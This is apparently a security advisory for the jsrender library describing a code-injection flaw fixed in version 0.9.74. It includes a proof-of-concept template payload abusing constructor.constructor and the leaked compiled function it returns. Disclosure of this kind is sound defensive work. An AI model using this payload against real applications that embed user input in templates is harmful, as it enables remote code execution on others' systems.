Affected versions of jsrender
are susceptible to a remote code execution vulnerability when used with server delivered client-side tempates which dynamically embed user input.
//POC-REQUEST
{{for ~x!=1?(constructor.constructor("return arguments.callee.caller")()):~y(10)}}
{{:#data}}
{{/for}}
//POC-RESPONSE
function anonymous(data,view,j,u) { // template var v,t=j._tag,ret="" +t("for",view,this,[ {view:view,tmpl:1, params:{args:['~x!=1?(constructor.constructor(\"return arguments.callee.caller\")()):~y(10)']}, args:[view.hlp("x")!=1?(data.constructor.constructor("return arguments.callee.caller")()):view.hlp("y")(10)], props:{}}]); return ret; }
Update to version 0.9.74 or later.
{ "nvd_published_at": null, "severity": "MODERATE", "github_reviewed_at": "2020-08-31T18:10:44Z", "github_reviewed": true, "cwe_ids": [ "CWE-94" ] }